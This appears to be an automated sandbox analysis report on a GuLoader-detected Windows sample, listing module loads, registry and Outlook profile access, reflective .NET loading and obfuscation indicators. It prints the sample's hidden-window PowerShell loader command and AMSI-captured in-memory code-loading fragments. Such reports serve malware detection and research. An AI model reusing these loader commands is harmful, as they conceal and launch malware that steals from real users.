Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Smilet.exe	Section loaded: umpdc.dll

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains potential unpacker

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: P1 HWT623ATG.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: P1 HWT623ATG.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718182571.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3709303599.000000000005E000.00000002.00000001.01000000.0000000F.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3709074079.000000000005E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: wntdll.pdbUGP source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576508573.0000000001200000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1578452345.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1575491955.0000000003721000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003C2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: P1 HWT623ATG.bat.exe, P1 HWT623ATG.bat.exe, 00000009.00000002.1576508573.0000000001200000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1578452345.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1575491955.0000000003721000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003C2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718182571.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000028.00000002.3709150978.0000000003F84000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: P1 HWT623ATG.bat.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: GnVIdcfKFYG.exe.1.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 1.2.P1 HWT623ATG.bat.exe.64c0000.9.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, s1DyL6nIr3WcZnwnks.cs	.Net Code: wNalb7SA3S System.Reflection.Assembly.Load(byte[])
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, s1DyL6nIr3WcZnwnks.cs	.Net Code: wNalb7SA3S System.Reflection.Assembly.Load(byte[])
Source: 1.2.P1 HWT623ATG.bat.exe.311b5f8.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 10.2.GnVIdcfKFYG.exe.252b60c.7.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Extensile $Fodsveds $Skiveboer), (Bechalks @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anvender = [AppDomain]::CurrentDomain.GetAssemblies()$global:For
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Unluxurious67)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Periodeklasse, $false).DefineType($Forgrene

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Algolagnic=Get-Content 'C:\Users\user\AppData\Local\erindres\keres\Renowned.tha';$Gnaskerierne=$Algolagnic.SubString(53079,3);.$Gnaskerierne($Algolagnic)"
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Algolagnic=Get-Content 'C:\Users\user\AppData\Local\erindres\keres\Renowned.tha';$Gnaskerierne=$Algolagnic.SubString(53079,3);.$Gnaskerierne($Algolagnic)"

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_064AC7A5 pushad ; retf	1_2_064AC7A8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_064A0E60 pushad ; ret	1_2_064A0E61
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07939780 push eax; retf	1_2_07939781
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_0793C6CD push FFFFFF8Bh; iretd	1_2_0793C6CF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00418141 push eax; ret	9_2_00418149
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00407954 push esp; retf	9_2_00407956
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_004021C8 push 9A9BCBBFh; retf	9_2_004021CD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0041426D push esp; iretd	9_2_0041426E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00407A02 push esp; retf	9_2_00407A07
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0041E2FA push edi; iretd	9_2_0041E33C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0041E303 push edi; iretd	9_2_0041E33C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00418421 push esp; iretd	9_2_0041843F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00411CC2 push eax; retf	9_2_00411CC6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_004035D0 push eax; ret	9_2_004035D2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00413E00 push es; retn 4BB0h	9_2_00413DFF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012309AD push ecx; mov dword ptr [esp], ecx	9_2_012309B6
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_0587C7A5 pushad ; retf	10_2_0587C7A8
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0118C54D pushfd ; ret	23_2_0118C54E
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0118C54F push 8B011167h; ret	23_2_0118C554
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011409AD push ecx; mov dword ptr [esp], ecx	23_2_011409B6
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0118C9D7 push edi; ret	23_2_0118C9D9
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01111FEC push eax; iretd	23_2_01111FED
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01197E99 push ecx; ret	23_2_01197EAC
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0042C161 push edx; ret	23_2_0042C16A

Source: P1 HWT623ATG.bat.exe	Static PE information: section name: .text entropy: 7.925374523955337
Source: GnVIdcfKFYG.exe.1.dr	Static PE information: section name: .text entropy: 7.925374523955337

Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, NRVK2hJ6dXJNQyKZOO.cs	High entropy of concatenated method names: 'ToString', 'ka7GwS8glg', 'k36GZUZ7CB', 'd94GB9bJHU', 'hqNGqJOklO', 'eSdGd6Mk2M', 'f5HGhPHfnd', 'o2xGPYdohx', 'JXTG3W92Fu', 'FsqGFSqKH6'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, KNppUKr85kkwKH4qwo.cs	High entropy of concatenated method names: 'h4rUQ3ENSl', 'C9KUanZHxW', 'HZ6Uy9BL8o', 'whvU66qlp6', 'aglUSg9rMJ', 'ocqUYnTI4u', 'eKDUcO0bhZ', 'E8cUN26IxA', 'RORUJMlZu1', 'ac7UEUuwUJ'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, FcbtOO8WgfsF9hQ5gx.cs	High entropy of concatenated method names: 'vxSaRsOIEy', 'FNRaebSv87', 'twrapcNke7', 'YWCa4dwZBU', 'anNajAVgqf', 'TTuaftkqDC', 'k2oamKa80d', 'ogcaCbTYTG', 'fABaAOSZ1G', 'bsCaLj6bOM'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, HJwCVeVbbxipNAU9GT.cs	High entropy of concatenated method names: 'fUaSMFj1jE', 'ScuSahOX8l', 'd26S61jWbo', 'I34SYK67Bo', 'xsYScuiDHr', 'sQF6jmbhao', 'Xdf6fq4C8L', 'wPF6mwlVvC', 'XQj6C2JK73', 'dQ16AH65Au'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, aQJnHScI5wvZXZMTWm.cs	High entropy of concatenated method names: 'Dispose', 'g7c7Aiwq7S', 'qOcrZYuqsd', 'ptvDDItpY6', 'C5F7LpSDqp', 'i2T7zCsZVq', 'ProcessDialogKey', 'R2Nr8GkSRX', 'Optr7GRrQ1', 'aoRrrCVtPS'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, l6XwAUzWixuITKWwX4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T2tv2o3Xmn', 'UTFvoFx5Mc', 'usEvGDJmoN', 'tP4v5EM91Z', 'uQ3vUvxwTh', 'xgWvvx90G5', 'KcHvkVwklE'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, V1MXp9MZRVUG2WnmBe.cs	High entropy of concatenated method names: 'LOd5CRkJpm', 'hWu5LjFuQP', 'fYMU8dJjBH', 'bdaU7JGGH9', 'API5w1tBYZ', 'Vse5nXvHH7', 'hoR5XDdTx0', 'VpC5Rg8ZDK', 'oye5eCQ000', 'HI25pc74Ov'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, bDmkrJF0yMmG3cWhFP.cs	High entropy of concatenated method names: 'GYfyOuWSkM', 'Gv9yIsyeqs', 'ITvyV3WjFN', 'YXEyi2SjAs', 'VGTyouNxGi', 'FsEyG7AAUa', 'I6Yy5hkRDM', 'cCoyULUVIh', 'lQHyv8E8mm', 'dpaykgMpwS'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, s1DyL6nIr3WcZnwnks.cs	High entropy of concatenated method names: 'XxrTMXvM3s', 'rkeTQavVUc', 'sYkTa1KDHR', 'OqNTy0wfun', 'xdMT6UkmtI', 'jgLTSgYcY0', 'knYTY6QfFr', 'lVITc3xHvg', 'u5vTN0C2pl', 'sJnTJ9Krpc'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, y1ISFm1UW32ChpJwDw.cs	High entropy of concatenated method names: 'B6M7YFImdT', 'K5k7cP5gH6', 'afv7Jiu40i', 'QUS7EhSXyF', 'UYv7ol5Wts', 'mtX7GD02pc', 'WRvkjyKspom3KMHwIv', 'lP0wBNuQ4LhwN55i59', 'exy77xSduM', 'My97TqMRvO'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, CeFBhkjXl7DfEU5pnic.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'F0SkRQCtym', 'eI7keP2KSP', 'JVekpRuPJu', 'dQak4sejCx', 'qk1kjw4HPV', 'dxmkfZHna1', 'GmVkmuafNB'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, mq96kWukfK2Q9hUELT.cs	High entropy of concatenated method names: 'EXibIJjLk', 'F8uO41ANo', 'u5OI4MqsE', 'v0b1SKyYw', 'MGdila3sm', 'zODuiiTYD', 'r2cRcOIaSAkpN1lV3G', 'HyahwmctveqvyR6wxB', 'Gh6UqQojS', 'uBWk6pHLQ'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, vQeePpjddQ8t34fOAnU.cs	High entropy of concatenated method names: 'r0SvHtcNlU', 'eLQv0gQlLL', 'KravbiplKh', 'U1YvONek55', 'He5vgvkaDM', 'YgivIhNEwR', 'j9Fv1xiQCs', 'tjCvVEV1Ee', 'LqoviNXAfp', 'uCBvuG7GZ6'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, rAn20DjuqaPuLG6SOA8.cs	High entropy of concatenated method names: 'gSDkHWkxn9', 'JNYk0gZ5O8', 'bojkbmgGxE', 'KwfJR9pcKhyd25CRnZ1', 's6hiwdpPevI7gKoyEBV', 'zLGuL5pB6IdX3FjNPR5', 'AWcjEhpraxGn07OK4Xy'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, Pp2hjWWk1HDNpyBeLi.cs	High entropy of concatenated method names: 'fOTYHBlsB9', 'QjvY0sgA34', 'Tl8YbapZuZ', 'PQeYO1mL1J', 'OH1YgdJRtf', 'iuFYIbJTWK', 'Xr9Y1QnLOL', 'MmIYVxC0qU', 'MDPYiu6kJR', 'ax1YuvjDWk'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, jKhuK7lYn9WVynG1co.cs	High entropy of concatenated method names: 'P9OoWow4nm', 'Hocont8fpP', 'DAZoRW9BFs', 'XdGoewkelT', 'CypoZspnr9', 'gmKoBkM5jG', 'njxoqdrggw', 'd5codKQlBZ', 'QZ7ohp28yI', 'SgXoPiOkEU'
